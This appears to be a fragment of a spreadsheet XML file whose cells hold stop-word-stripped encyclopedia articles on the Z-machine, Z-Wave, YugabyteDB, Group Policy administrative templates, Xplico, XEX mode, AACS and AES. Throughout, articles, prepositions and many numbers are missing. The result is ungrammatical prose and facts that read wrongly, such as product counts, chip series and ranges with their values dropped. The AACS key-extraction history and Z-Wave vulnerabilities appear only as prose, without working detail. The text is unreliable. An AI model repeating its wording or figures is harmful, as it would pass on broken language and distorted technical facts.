text-only adventures, large enough elaborate games. during 1990s, nelson drew z-machine standard based detailed studies existing infocom files. interpreters interpreters z-code files available wide variety platforms. inform website lists links freely available interpreters desktop operating systems (including 8-bit microcomputers 1980s apple trs-80, spectrum, grouping "unix" "windows" each), mobile operating systems (including palm game boy), four interpreter platforms (emacs, java, javascript, scratch). according nelson, "possibly portable virtual machine ever created".popular interpreters include nitfol frotz. nitfol makes api, supports versions z-machine, including version graphical z-machine. save files stored standard quetzal save format. binary files available several different operating systems, including classic unix-like systems, dos, windows.frotz written stefan jokisch 1995 dos. over time ported platforms, unix-like systems, risc ios. sound effects graphics supported varying degrees. 2002, development stalled program picked david griffith. code base split virtual machine user interface portions virtual machine became independent user interface. this allowed variety porting frotz. stranger ports also simplest: instant messaging wrapped around version frotz minimum functionality creating play z-machine games using instant messaging client.another popular client macos unix-like systems zoom. supports quetzal save-format, packaging file-structure different. also glulx similar z-machine, relieves several legacy limitations inform computer language produce z-machine programs scumm script creation utility maniac mansion lucasarts, graphical system similar z-machine tads like glulx, made address limitations motorola 68000 series base architecture used virtual machines magnetic scrolls' adventure games references external links z-machine standards document learning wayback machine (archived august 2010) (pdf) infocom manual 1989 description wayback machine (archived march 2012) (pdf) z-language interpreter program (infocom internal document) 1989 interpreters large program into small machine describes creation design z-machine</t>
  </si>
  <si>
    <t>Z-Wave</t>
  </si>
  <si>
    <t>z-wave wireless communications protocol used primarily residential commercial building automation. mesh network using low-energy radio waves communicate device device, allowing wireless control smart home devices, smart lights, security systems, thermostats, sensors, smart door locks, garage door openers. like protocols systems aimed residential, commercial, building markets, z-wave system controlled smart phone, tablet, computer, locally smart speaker, wireless keyfob, wall-mounted panel z-wave gateway central control device serving controller. z-wave provides application layer interoperability home control systems different manufacturers part alliance. there growing number interoperable z-wave products; 1,700 2017, 2,600 2019, 4,000 2022. history z-wave protocol developed zensys, danish company based copenhagen, 1999. that year, zensys introduced consumer light-control system, evolved z-wave proprietary system chip (soc) home automation protocol unlicensed frequency band range. series chip released 2003, series released 2005, zw0201 chip offering high performance cost. series chip, also known z-wave plus, released march 2013, four times memory, improved wireless range, improved battery life, enhanced security framework, smartstart setup feature. series chip released 2019, ability communicate meters directly point-to-point, meters across entire z-wave network, extended battery life years, comes smartstart technology. july 2019, z-wave plus certification announced. designed devices built platform. z-wave long range (lr) specification announced september 2020, specification four-times wireless range standard z-wave. z-wave's series chip released late 2021, improved security battery life series.the technology began catch north america around 2005, five companies, including danfoss, ingersoll-rand leviton manufacturing, adopted z-wave. they formed z-wave alliance, whose objective promote z-wave technology, certified products companies alliance interoperable. 2005, bessemer venture partners million third seed round zensys. 2006, intel capital announced investing zensys, days intel joined z-wave alliance. 2008, zensys received investments panasonic, cisco systems, palamon capital partners sunstone capital.z-wave acquired sigma designs december 2008. following acquisition, z-wave's u.s. headquarters fremont, california merged sigma's headquarters milpitas, california. part changes, trademark interests z-wave retained united states sigma designs acquired subsidiary aeotec group europe. january 2018, sigma announced planned sell z-wave technology business assets silicon labs $240 million, sale completed april 2018.in 2005, products market used z-wave technology. 2012, smart home technology becoming increasingly popular, approximately products using z-wave technology available u.s. june 2022, 4,000 z-wave certified interoperable products. interoperability z-wave's interoperability application layer ensures devices share information allows z-wave hardware software work together. wireless mesh networking technology enables node talk adjacent nodes directly indirectly, controlling additional nodes. nodes within range communicate directly another. within range, link another node within range access exchange information. september 2016, certain parts z-wave technology made publicly available, then-owner sigma designs released public version z-wave's interoperability layer, software added z-wave's open-source library. z-wave mac/phy globally standardized international telecommunication union 9959 radio. open-source availability allows software developers integrate z-wave devices fewer restrictions. z-wave's security, z/ip transporting z-wave signals networks, z-wave middleware open source 2016. 2020, z-wave alliance ratified z-wave specification, adding application open-source development. alliance technical working group manages z-wave specification development maintains library standard implementations z-wave compliant products. standards z-wave alliance established 2005 re-incorporated non-profit 2020, z-wave alliance member-driven standards development organization dedicated market development, technical z-wave specification device certification, education z-wave technology. z-wave alliance consortium companies residential commercial connected technology market. z-wave alliance certifies devices standards guarantee interoperability full backwards compatibility among generations z-wave devices. these standards include specifications reliability, range, power consumption, device interoperability.in october 2013, protocol interoperability certification program called z-wave plus announced, based upon features higher interoperability standards bundled together required series system chip (soc), including features available since 2012 300/400 series socs. february 2014, first product certified z-wave plus.in 2016, alliance launched z-wave certified installer training program give installers, integrators dealers tools deploy z-wave networks devices residential commercial jobs. that year, alliance announced z-wave certified installer toolkit (z-cit), diagnostics troubleshooting device used network device setup also function remote diagnostics tool.z-wave long range (lr) announced september 2020, specification increased range regular z-wave signals. specification managed certified z-wave plus certification. march 2022, z-wave alliance announced ecolink, security home automation brand, first complete z-wave certification, ecolink series garage door controller.z-wave alliance maintains z-wave certification program. there components z-wave certification: technical certification market certification.in december 2019, z-wave alliance announced z-wave specification would become ratified, multi-source wireless standard. includes itu.g9959 phy/mac radio specification, application layer, network layer, host-device communication protocol. instead single-source specification, become multi-source, wireless smart home standard developed collective working group members z-wave alliance. z-wave alliance would become standards development organization (sdo), continuing manage certification program. august 2020, z-wave alliance officially became incorporated independent nonprofit standards development organization, seven founding members structure: alarm.com, assa abloy, leedarson, ring, silicon labs, stratis, qolsys. under sdo, membership levels, workgroups, committees, including technical working groups specific features, certification, security, marketing groups. technical characteristics radio frequencies z-wave designed provide reliable, low-latency transmission small data packets data rates 100kbit/s, suitable control sensor applications, unlike wi-fi ieee 802.11-based wireless systems designed primarily high data rates. communication distance nodes meters line sight outdoors meters line sight indoors, message ability four times nodes, gives enough coverage residential houses. modulation frequency-shift keying (fsk) manchester encoding, supported modulations schemes include gfsk dsss-oqpsk.z-wave uses part unlicensed industrial, scientific, medical (ism) band, operating varying frequencies globally. instance, europe operates 868-869 band north america band varies 908-916 z-wave operating mesh network 912-920 z-wave operating star topology z-wave mode. z-wave's mesh network band competes cordless telephones consumer electronics devices, avoids interference wi-fi, bluetooth systems operate crowded band. lower layers, phy, described itu-t g.9959 fully backwards compatible. 2012, international telecommunication union (itu) included z-wave layers option g.9959 standard wireless devices ghz. data rates include 9600 bit/s kbit/s, output power dbm.z-wave released used frequencies following frequency bands various parts world: network setup, topology routing traditional hub-and-spoke networks include central access point devices connected, wireless device connecting router. z-wave devices create mesh network, devices communicate addition central hub. advantages mesh network include greater range compatibility, stronger network.z-wave devices operate star network topology features central point establishes direct connection device, rather sending signals node node intended destination met, mesh network. difference star network mesh network direct hub-to-device connection. both z-wave traditional z-wave nodes coexist within network.the simplest network single controllable device primary controller. devices communicate another using intermediate nodes actively route around circumvent household obstacles radio dead spots might occur multipath environment house. message node node successfully delivered even nodes within range, providing third node communicate nodes preferred route unavailable, message originator attempt routes path found node. therefore, z-wave network span much farther radio range single unit; however, several hops slight delay introduced control command desired result.additional devices added time, secondary controllers, including traditional hand-held controllers, key-fob controllers, wall-switch controllers applications designed management control z-wave network. z-wave network consist devices, 4,000 nodes single smart-home network z-wave both allow option bridging networks devices required.a device must "included" z-wave network controlled z-wave. this process (also known "pairing" "adding") usually achieved pressing sequence buttons controller device added network. this sequence needs performed once, device always recognized controller. devices removed z-wave network similar process. controller learns signal strength devices inclusion process utilize information calculating routes. event devices moved previously stored signal strength wrong, controller issue route resolution explore frames. each z-wave network identified network device identified node network (also called home common identification nodes belonging logical z-wave network. network length bytes bits) assigned device, primary controller, device "included" network. nodes different network cannot communicate other. node address single node network. node length byte bits) must unique network.the z-wave chip optimized battery-powered devices, time remains power saving mode consume less energy, waking perform function. with z-wave mesh networks, device house bounces wireless signals around house, results power consumption, allowing devices work years without needing replace batteries. z-wave units able route unsolicited messages, cannot sleep mode. therefore, battery-operated devices designed repeater units. mobile devices, remote controls, also excluded since z-wave assumes repeater capable devices network remain original detected position. security z-wave based proprietary design, supported sigma designs primary chip vendor, z-wave business unit acquired silicon labs 2018. december 2019, silicon labs announced would release z-wave specification open wireless standard development certified z-wave alliance. early vulnerability uncovered aes-encrypted z-wave door locks could remotely exploited unlock doors without knowledge encryption keys, changed keys, subsequent network messages, "door open", would ignored established controller network. vulnerability flaw z-wave protocol specification implementation error door-lock manufacturer.on november 2016, z-wave alliance announced stronger security standards devices receiving z-wave certification april 2017. known security s2), provides advanced security smart home devices, gateways hubs. shores encryption standards transmissions nodes, mandates pairing procedures device, unique codes device. layer authentication intended prevent hackers taking control unsecured poorly-secured devices. according z-wave alliance, security standard advanced security available market smart home devices controllers, gateways hubs. series chip, released late 2021, continues support standard security capabilities, well silicon labs secure vault technology, enabling wireless devices certification level security.in 2022, researchers published several vulnerabilities z-wave chipsets series, based open-source protocol-specific fuzzer. result, depending chipset device, attacker within z-wave radio range deny service, cause devices crash, deplete batteries, intercept, observe, replay traffic, control vulnerable devices. related cves (cve-2020-9057, cve-2020-9058, cve-2020-9059, cve-2020-9060, cve-2020-9061, cve-2020-10137) published cert. hardware chip z-wave nodes zw0500, built around intel mcs-51 microcontroller internal system clock mhz. part chip contains gisfsk transceiver software selectable frequency. with power supply 2.2-3.6 volts, consumes 23ma transmit mode. features include aes-128 encryption, 100kbit/s wireless channel, concurrent listening multiple channels, support.at consumer electronics show january 2018, sigma designs introduced z-wave platform. series chip released 2019. enables class smart home devices used outdoors, range feet, operate coin-cell battery decade. though series uses 32-bit cortex soc, remains backward compatible z-wave devices. includes enhanced security framework well smartstart setup feature. july 2019, z-wave alliance announced z-wave plus certification, designed devices built platform, stronger interoperability security, easier installation process.z-wave long range (lr) announced september 2020, specification improved range regular z-wave signals. specification supports maximum output power dbm, used bolster transmission range several miles. testing, z-wave transmission distance 1-mile (1.6 direct line sight utilizing +14-dbm output power. z-wave extra 100-kb/s dsss oqpsk modulation addition z-wave protocol. modulation treated fourth channel, allowing gateways nodes existing z-wave channel scanning. z-wave also increases scalability single smart-home network 4,000 nodes, increase compared z-wave. z-wave operates power sensors last years single coin cell. backwards compatible interoperable z-wave devices.in december 2021, silicon labs announced availability z-wave system-on-chips modules z-wave smart home automation ecosystem. described secure, ultra-low powered, wireless, internet things devices, improved battery life compared series. comparison protocols smart home wireless networking, numerous technologies working together. z-wave operates sub1ghz (low bandwidth) 2.4ghz (high bandwidth) capitalize application-level benefits power, long range, less interference. wifi bluetooth operate 2.4ghz bandwidth manages traffic among devices consume power. other network standards include bluetooth thread. z-wave better interoperability zigbee, zigbee faster data transmission rate. thread zigbee operate busy wi-fi standard frequency ghz, z-wave operates united states, reduced noise congestion, greater coverage area. three mesh networks.the z-wave mac/phy globally standardized international telecommunication union 9959 radio, z-wave interoperability, security (s2), middleware z-wave specifications released public domain 2016, z-wave become fully-ratified open-source protocol development.openzwave library, written wrappers supporting projects, interface different languages protocol(s) allowing anyone create applications control devices z-wave network, without requiring in-depth knowledge z-wave protocol. this software currently aimed application developers wish incorporate z-wave functionality applications.matter, brought forth connectivity standards alliance, founded december 2019, aims unify device communication connected devices work together, across wireless technologies smart home ecosystems. z-wave networks gateway level, enabling cloud connectivity matter. they also work together local network level. also bluetooth matter (connectivity protocol) thread (network protocol) wi-fi zigbee references external links official website</t>
  </si>
  <si>
    <t>YugabyteDB</t>
  </si>
  <si>
    <t>yugabytedb high-performance transactional distributed database cloud-native applications, developed yugabyte. history yugabyte founded ex-facebook engineers kannan muthukkaruppan, karthik ranganathan, mikhail bautin. facebook, part team built operated cassandra hbase. team scaled data platform massive real-time workloads facebook messenger facebook's operational data store millions billions users years.the founders came together february 2016 build yugabytedb, believing trends experienced facebook microservices, containerization, high availability, geographic distribution, apis, open-source relevant businesses, especially move on-premise cloud-native operations.yugabytedb initially available editions: community enterprise. july 2019, yugabyte open sourced previously commercial features launched yugabytedb open-source apache license. rapid evolution product named 2020 gartner cool vendor data management.yugabyte launched yugabyte cloud,, renamed yugabytedb managed, fully managed database-as-a-service offering yugabytedb, september 2021. yugabyte cloud combines power distributed ease cloud database management system. funding only years company inception yugabyte closed $188 million series funding round become unicorn start-up valuation $1.3bn architecture yugabytedb distributed database strongly transactionally consistent across failure zones (i.e. acid compliance] demonstrated jepsen testing. theorem terms yugabytedb consistent/partition tolerant (cp) database.yugabytedb layers, storage engine known docdb yugabyte query layer. docdb storage engine consists customized rocksdb combined sharding load balancing algorithms data. addition, raft consensus algorithm controls replication data nodes. there also distributed transaction manager multiversion concurrency control (mvcc) support distributed transactions.the engine also exploits hybrid logical clock combines coarsely-synchronized physical clocks lamport clocks track causal relationships.the docdb layer directly accessible users. yugabytedb query layer yugabyte pluggable query layer abstracts query layer storage layer below. there currently apis access database:ysql postgresql code-compatible based around v11.2. ysql accessed standard postgresql drivers using native protocols. exploits native postgresql code query layer replaces storage engine calls pluggable query layer. this re-use means yugabyte supports many features, including: triggers stored procedures postgresql extensions operate query layer native jsonb supportycql cassandra-like based around v3.10 re-written c++. ycql accessed standard cassandra drivers using native protocol port 9042. addition 'vanilla' cassandra components, ycql augmented following features: transactional consistency unlike cassandra, yugabyte ycql transactional. json data types supported natively tables secondary indexescurrently, data written either accessible api, however ysql access ycql using postgresql foreign data wrapper feature.the security model accessing system inherited api, access controls ysql look like postgresql, ycql looks like cassandra access controls. additional functionality addition core database functionality, additional features note cluster-to-cluster replication yugabytedb ability replicate database instances. replication one-way bi-directional asynchronous. one-way replication used either create read-only copy workload off-loading read-write mode create active-passive standby. bi-directional replication generally used read-write configurations used active-active configurations, geo-distributed applications, etc. also cloud database distributed comparison relational database management systems comparison object–relational database management systems cloud native computing database management system list databases using mvcc list relational database management systems cockroachdb tidb references external links official website yugabyte-db github slack community</t>
  </si>
  <si>
    <t>Administrative Template</t>
  </si>
  <si>
    <t>administrative templates feature group policy, microsoft technology centralized management machines users active directory environment. administrative templates facilitate management registry-based policy. file used describe user interface presented group policy administrator registry keys updated target machines. file text file specific syntax describes interface registry values changed policy enabled disabled. files consumed group policy object editor (gpedit). windows service pack shipped five files (system.adm, inetres.adm, wmplayer.adm, conf.adm wuau.adm). these merged unified "namespace" gpedit presented administrator administrative templates node (for machine user policy). syntax simple example follows: class machine category "wikipedia apps" policy "wikipedia" keyname "software\wikisoft\preferences" explain "configures wikisoft preferences" valuename "sharingenabled" valueon "yes" valueoff "no" policy category valid file must following keywords: class either machine user category defines organizational structure displayed gpedit window. policy groups definitions node configuration screen gpedit treeoptional keywords used include: keyname used define registry affectedview filtering must turned order custom preference settings (such example) group policy editor. files across different platforms important note files shipped microsoft operating systems include descriptions policy settings platform platforms group policy supported. example, windows service pack files described policy settings platform also windows 2000 windows server 2003. this approach allows management machines running operating system gpedit used. managing files default, files stored gpo, within sysvol domain controllers. this creates simple effective model replicating files across domain controllers (which handled file replication service). however, instances cause operational issues. end, various policy settings available manage manner files read stored. these described microsoft's article 816662. external links important information windows service pack files 842933) recommendations managing group policy administrative templates (.adm) files 816662)</t>
  </si>
  <si>
    <t>Xplico</t>
  </si>
  <si>
    <t>xplico network forensics analysis tool (nfat), software reconstructs contents acquisitions performed packet sniffer (e.g. wireshark, tcpdump, netsniff-ng). unlike protocol analyzer, whose main characteristic reconstruction data carried protocols, xplico born expressly reconstruct protocol's application data able recognize protocols technique named port independent protocol identification (pipi).the name "xplico" refers latin verb explico significance. xplico free open-source software, subject requirements general public license (gpl), version overview clarify xplico imagine data (ethernet ppp) navigation (http protocol), case xplico able extract reconstruct pages contents (images, files, cookies, on). similarly xplico able reconstruct e-mail exchanged imap, pop, smtp protocols. among protocols xplico identifies reconstructs voip, msn, irc, http, imap, pop, smtp, ftp. features software architecture xplico's software architecture provides: input module handle data input (from probes packet sniffer) output module organize decoded data presenting user; decoding modules, called protocol dissector decoding individual network protocol.with output module xplico different user interfaces, fact used command line user interface called "xplico interface". protocol dissector modules decoding individual protocol, protocol dissector reconstruct extract data protocol. modules plug-in and, configuration file, loaded execution program. this allows focus decoding, want decode voip calls traffic configure xplico load modules excluding http module. large scale pcap data analysis another feature xplico ability process (reconstruct) huge amounts data: able manage pcap files multiple gigabytes even terabytes multiple capture probes simultaneously. this thanks various types "input modules". pcap files uploaded many ways, directly xplico user interface, sftp transmission channel called pcap-over-ip. features xplico used contexts lawful interception network forensics. voip calls xplico also specific version called pcap2wav able decode voip calls based protocol (sip, h323, mgcp, skinny) supports decodidica audio codecs g711ulaw, g711alaw, g722, g729, g723, g726, msrta (microsoft's real-time audio). basic commands working command line examples, assumed eth0 used network interface. real-time acquisition decoding:xplico rltm eth0 decoding single pcap file:xplico pcap example.pcap decoding directory contains many files pcapxplico pcap /path/dir/ cases data decoded stored directory named xdecode. with parameter select "input module" type. input module named rltm acquires data directly network interface, vice versa input module named pcap acquires data form pcap files directory. distributions xplico installed default major distributions digital forensics penetration testing: kali linux, backtrack, deft, security onion matriux backbox cert linux forensics tools repository. also comparison packet analyzers tcpdump, packet analyzer pcap, application programming interface (api) capturing network traffic snoop, command line packet analyzer included solaris wireshark, network packet analyzer dsniff, packet sniffer traffic analysis tools netsniff-ng, free linux networking toolkit ngrep, tool match regular expressions within network packet payloads etherape, network mapping tool relies sniffing traffic tcptrace, tool analyzing logs produced tcpdump references external links official website xplico demo cloud pcap2wav rtp2wav demo cloud</t>
  </si>
  <si>
    <t>Xor–encrypt–xor</t>
  </si>
  <si>
    <t>xor–encrypt–xor (xex) (tweakable) mode operation block cipher. tweaked-codebook mode ciphertext stealing (xts mode), popular modes operation whole-disk encryption. also common form whitening, part smart card proposals. history 1984, protect exhaustive search attacks, rivest proposed desx: pre-whitening plaintext, encrypt result using secret key, postwhitening encrypted result produce final ciphertext.in 1991, motivated rivest's desx construction, even mansour proposed much simpler scheme (the "two-key even–mansour scheme"), suggested perhaps simplest possible block cipher: plaintext prewhitening key, apply publicly known unkeyed permutation practice, pseudorandom permutation) result, postwhitening permuted result produce final ciphertext.studying simple even–mansour style block ciphers gives insight security feistel ciphers (des-like ciphers) helps understand block cipher design general.orr dunkelman, nathan keller, shamir later proved possible simplify even–mansour scheme even still retain provable security, producing "single-key even–mansour scheme": plaintext key, apply publicly known unkeyed permutation result, permuted result produce final ciphertext.in 2004, rogaway presented scheme.rogaway used allow efficient processing consecutive blocks (with respect cipher used) within data unit (e.g., disk sector) whole-disk encryption.many whole-disk encryption systems bestcrypt, dm-crypt, freeotfe, truecrypt, diskcryptor, freebsd's geli, openbsd softraid disk encryption software, lion's filevault support xex-based tweaked-codebook mode ciphertext stealing (xts mode). references</t>
  </si>
  <si>
    <t>Advanced Access Content System</t>
  </si>
  <si>
    <t>advanced access content system (aacs) standard content distribution digital rights management, intended restrict access copying post-dvd generation optical discs. specification publicly released april 2005 standard adopted access restriction scheme blu-ray disc (bd). developed aacs licensing administrator, (aacs la), consortium includes disney, intel, microsoft, panasonic, warner bros., ibm, toshiba sony. aacs operating "interim agreement" since final specification (including provisions managed copy) finalized. since appearing devices 2006, several aacs decryption keys extracted software players published internet, allowing decryption unlicensed software. system overview encryption aacs uses cryptography control restrict digital media. encrypts content title keys using advanced encryption standard (aes). title keys decrypted using combination media (encoded media block) volume media (e.g., physical serial number embedded pre-recorded disc). principal difference aacs (the system used dvds cds) lies device decryption keys codes organized. under css, players given model group provisioned shared activated decryption key. content encrypted title-specific key, encrypted model's key. thus disc contains collection several hundred encrypted keys, licensed player model. principle, approach allows licensors "revoke" given player model (prevent playing back future content) omitting encrypt future title keys player model's key. practice, however, revoking players particular model costly, causes many users lose playback capability. furthermore, inclusion shared across many players makes compromise significantly likely, demonstrated number compromises mid-1990s. approach aacs provisions individual player unique decryption keys used broadcast encryption scheme. this approach allows licensors "revoke" individual players, specifically, decryption keys associated player. thus, given player's keys compromised published, aacs simply revoke keys future content, making keys/player useless decrypting titles. aacs also incorporates traitor tracing techniques. standard allows multiple versions short sections movie encrypted different keys, given player able decrypt version section. manufacturer embeds varying digital watermarks (such cinavia) sections, upon subsequent analysis pirated release compromised keys identified revoked (this feature called sequence keys aacs specifications). volume volume unique identifiers serial numbers stored pre-recorded discs special hardware. they cannot duplicated consumers' recordable media. point prevent simple bit-by-bit copies, since volume required (though sufficient) decoding content. blu-ray discs, volume stored bd-rom mark.to read volume cryptographic certificate (the private host key) signed aacs required. however, circumvented modifying firmware blu-ray drives. decryption process view movie, player must first decrypt content disc. decryption process somewhat convoluted. disc contains items—the media block (mkb), volume encrypted title keys, encrypted content. encrypted subset difference tree approach. essentially, keys arranged tree given used find every except parent keys. this way, revoke given device key, needs encrypted device key's parent key. once decrypted, provides media key, combined volume (which program presenting cryptographic certificate drive, described above) one-way encryption scheme (aes-g) produce volume unique (kvu). used decrypt encrypted title keys, used decrypt encrypted content. analog outputs aacs-compliant players must follow guidelines pertaining outputs analog connections. this flag called image constraint token (ict), restricts resolution analog outputs 960×540. full 1920×1080 resolution restricted hdmi outputs support hdcp. decision flag restrict output ("down-convert") left content provider. warner pictures proponent ict, expected paramount universal implement down-conversion well. aacs guidelines require title implements must clearly state packaging. german magazine "der spiegel" reported unofficial agreement film studios electronics manufacturers 2010 2012. however, titles already released apply ict. audio watermarking june 2009, licensing agreements aacs finalized, updated make cinavia detection commercial blu-ray disc players requirement. managed copy managed copy refers system consumers make legal copies films digital content protected aacs. this requires device obtain authorization contacting remote server internet. copies still protected drm, infinite copying possible (unless explicitly allowed content owner). mandatory content providers give consumer flexibility blu-ray standards (commonly called mandatory managed copy). blu-ray standards adopted mandatory managed copy later dvd, requested it.possible scenarios managed copy include (but limited to): create exact duplicate onto recordable disc backup create full-resolution copy storage media server create scaled-down version watching portable devicethis feature included interim standard, first devices market capability. expected part final aacs specification.in june 2009, final aacs agreements ratified posted online, include information managed copy aspects aacs. history february 2001, dalit naor, moni naor jeff lotspiech published paper entitled "revocation tracing schemes stateless receivers", described broadcast encryption scheme using construct called naor-naor-lotspiech subset-difference trees. that paper laid theoretical foundations aacs.the aacs consortium founded 2004. with decss hindsight, ieee spectrum magazine's readers voted aacs technologies likely fail january 2005 issue. final aacs standard delayed, delayed important member blu-ray group voiced concerns. request toshiba, interim standard published include features, like managed copy. october 2007, final aacs standard released. unlicensed decryption december 2006, person using alias "muslix64" published working, open-sourced aacs decrypting utility named backuphddvd, looking publicly available aacs specifications. given correct keys, used decrypt aacs-encrypted content. corresponding backupbluray program soon developed. blu-ray copy program capable copying blu-rays hard drive blank bd-r discs. security both title keys keys used decrypt (known processing keys aacs specifications) found using debuggers inspect memory space running blu-ray player programs. hackers also claim found device keys (used calculate processing key) host private signed aacs used hand-shaking host drive; required reading volume id). first unprotected movies available soon afterwards. processing widely published internet found aacs sent multiple dmca takedown notices censoring some sites rely user-submitted content, like digg wikipedia, tried remove mentions key. digg administrators eventually gave trying censor submissions contained key.the aacs extractions highlight inherent weakness system permit software players used playback content. matter many layers encryption employed, offer true protection, since keys needed obtain unencrypted content stream must available somewhere memory playback possible. platform offers prevent memory snooping attacks keys, since configuration always emulated virtual machine, theory without running program external system able detect virtualization. wholly prevent attacks like would require changes platform (see trusted computing) could provide protection attacks. this would require content distributors permit content played without trusted computing technology, providing companies making software players non-trusted needed encryption keys. april 2007, aacs consortium announced expired certain encryption keys used pc-based applications. patches available windvd powerdvd used uncompromised encryption keys. old, compromised keys still used decrypt titles, newer releases encrypted keys. users affected players (even considered "legitimate" aacs forced upgrade replace player software order view titles. despite revocations, current titles decrypted using keys widely available internet. besides spreading processing keys internet, also efforts spread title keys various sites. aacs sent dmca takedown notices sites least occasion. there also commercial software (anydvd circumvent aacs protection. apparently program works even movies released aacs expired first batch keys.while great care taken aacs ensure contents encrypted right display device, first versions blu-ray software players perfect copy still frame film could made simply utilizing print screen function windows operating system. patent challenges 2007, canadian encryption vendor certicom sued sony alleging aacs violated patents, "strengthened public protocol" "digital signatures smartcard." patents filed 1999 2001 respectively, 2003 national security agency paid million right certicom's patents, including sony alleged infringed lawsuit dismissed 2009. also history attacks advanced access content system aacs encryption controversy references external links aacs homepage aacs specifications understanding aacs, introductory forum thread. isan homepage, isan required content defined aacs introduction common cryptographic elements 0.91 libaacs, open source library implementing aacs finney 'aacs processing key', finney's post metzdowd.com cryptography mailing list</t>
  </si>
  <si>
    <t>Advanced Encryption Standard process</t>
  </si>
  <si>
    <t>advanced encryption standard (aes), symmetric block cipher ratified standard national institute standards technology united states (nist), chosen using process lasting 1997 2000 markedly open transparent predecessor, data encryption standard (des). this process praise open cryptographic community, helped increase confidence security winning algorithm suspicious backdoors predecessor, des. standard needed primarily relatively small 56-bit becoming vulnerable brute-force attacks. addition, designed primarily hardware relatively slow implemented software. while triple-des avoids problem small size, slow even hardware, unsuitable limited-resource platforms, affected potential security issues connected (today comparatively small) block size bits. start process january 1997, nist announced wished choose successor known aes. like des, unclassified, publicly disclosed encryption algorithm capable protecting sensitive government information well next century." however, rather simply publishing successor, nist asked input interested parties successor chosen. interest open cryptographic community immediately intense, nist received great many submissions three-month comment period. result feedback call algorithms september 1997. algorithms block ciphers, supporting block size bits sizes 128, 192, bits. such ciphers rare time announcement; best known probably square. rounds nine months followed, fifteen designs created submitted several countries. they were, alphabetical order: cast-256, crypton, deal, dfc, frog, hpc, loki97, magenta, mars, rc6, rijndael, safer+, serpent, twofish. ensuing debate, many advantages disadvantages candidates investigated cryptographers; assessed security, also performance variety settings (pcs various architectures, smart cards, hardware implementations) feasibility limited environments (smart cards limited memory, gate count implementations, fpgas). some designs fell cryptanalysis ranged minor flaws significant attacks, others lost favour poor performance various environments little offer candidates. nist held conferences discuss submissions (aes1, august 1998 aes2, march 1999), august 1999 announced narrowing field fifteen five: mars, rc6, rijndael, serpent, twofish. five algorithms, commonly referred "aes finalists", designed cryptographers considered well-known respected community. aes2 conference votes follows: rijndael: positive, negative serpent: positive, negative twofish: positive, negative rc6: positive, negative mars: positive, negativea round intense analysis cryptanalysis followed, culminating aes3 conference april 2000, representative final five teams made presentation arguing design chosen aes. selection winner october 2000, nist announced rijndael selected proposed started process making official standard publishing announcement federal register february 2001 draft fips solicit comments. november 2001, nist announced approved fips 197. nist praises cryptographic community openness care standards process. bruce schneier, authors losing twofish algorithm, wrote competition nothing good things nist process." also caesar competition competition design authenticated encryption schemesnist hash function competition post-quantum cryptography standardization references external links historical overview process found nist's website. sci.crypt newsgroup, extensive discussions process.</t>
  </si>
  <si>
    <t>Advanced Encryption Standard</t>
  </si>
  <si>
    <t>advanced encryption standard (aes), also known original name rijndael (dutch pronunciation: [ˈrɛindaːl]), specification encryption electronic data established u.s. national institute standards technology (nist) 2001.aes variant rijndael block cipher developed belgian cryptographers, joan daemen vincent rijmen, submitted proposal nist selection process. rijndael family ciphers different block sizes. aes, nist selected three members rijndael family, block size bits, three different lengths: 128, bits. adopted u.s. government. supersedes data encryption standard (des), published 1977. algorithm described symmetric-key algorithm, meaning used encrypting decrypting data. united states, announced nist u.s. fips (fips 197) november 2001. this announcement followed five-year standardization process fifteen competing designs presented evaluated, rijndael cipher selected suitable.aes included iso/iec 18033-3 standard. became effective u.s. federal government standard 2002, approval u.s. secretary commerce. available many different encryption packages, first (and only) publicly accessible cipher approved u.s. national security agency (nsa) secret information used approved cryptographic module. definitive standards advanced encryption standard (aes) defined fips 197: advanced encryption standard (aes) iso/iec 18033-3: block ciphers description ciphers based design principle known substitution–permutation network, efficient software hardware. unlike predecessor des, feistel network. variant rijndael, fixed block size bits, size 128, 192, bits. contrast, rijndael specified block sizes multiple bits, minimum maximum bits. operates column-major order array bytes, termed state. most calculations done particular finite field. instance, bytes, {\displaystyle b_{0},b_{1},...,b_{15}} represented two-dimensional array: {\displaystyle {\begin{bmatrix}b_{0}&amp;b_{4}&amp;b_{8}&amp;b_{12}\\b_{1}&amp;b_{5}&amp;b_{9}&amp;b_{13}\\b_{2}&amp;b_{6}&amp;b_{10}&amp;b_{14}\\b_{3}&amp;b_{7}&amp;b_{11}&amp;b_{15}\end{bmatrix}}} size used cipher specifies number transformation rounds convert input, called plaintext, final output, called ciphertext. number rounds follows: rounds 128-bit keys. rounds 192-bit keys. rounds 256-bit keys.each round consists several processing steps, including depends encryption itself. reverse rounds applied transform ciphertext back original plaintext using encryption key. high-level description algorithm keyexpansion round keys derived cipher using schedule. requires separate 128-bit round block round plus more. initial round addition: addroundkey byte state combined byte round using bitwise xor. rounds: subbytes non-linear substitution step byte replaced another according lookup table. shiftrows transposition step last three rows state shifted cyclically certain number steps. mixcolumns linear mixing operation operates columns state, combining four bytes column. addroundkey final round (making rounds total): subbytes shiftrows addroundkey subbytes step subbytes step, byte {\displaystyle a_{i,j}} state array replaced subbyte {\displaystyle s(a_{i,j})} using 8-bit substitution box. note round state array simply plaintext/input. this operation provides non-linearity cipher. s-box used derived multiplicative inverse gf(28), known good non-linearity properties. avoid attacks based simple algebraic properties, s-box constructed combining inverse function invertible affine transformation. s-box also chosen avoid fixed points (and derangement), i.e., {\displaystyle s(a_{i,j})\neq a_{i,j}} also opposite fixed points, i.e., {\displaystyle s(a_{i,j})\oplus a_{i,j}\neq {\text{ff}}_{16}} while performing decryption, invsubbytes step (the inverse subbytes) used, requires first taking inverse affine transformation finding multiplicative inverse. shiftrows step shiftrows step operates rows state; cyclically shifts bytes certain offset. aes, first left unchanged. each byte second shifted left. similarly, third fourth rows shifted offsets three respectively. way, column output state shiftrows step composed bytes column input state. importance step avoid columns encrypted independently, case would degenerate four independent block ciphers. mixcolumns step mixcolumns step, four bytes column state combined using invertible linear transformation. mixcolumns function takes four bytes input outputs four bytes, input byte affects four output bytes. together shiftrows, mixcolumns provides diffusion cipher. during operation, column transformed using fixed matrix (matrix left-multiplied column gives value column state): {\displaystyle {\begin{bmatrix}b_{0,j}\\b_{1,j}\\b_{2,j}\\b_{3,j}\end{bmatrix}}={\begin{bmatrix}2&amp;3&amp;1&amp;1\\1&amp;2&amp;3&amp;1\\1&amp;1&amp;2&amp;3\\3&amp;1&amp;1&amp;2\end{bmatrix}}{\begin{bmatrix}a_{0,j}\\a_{1,j}\\a_{2,j}\\a_{3,j}\end{bmatrix}}\qquad 0\leq j\leq matrix 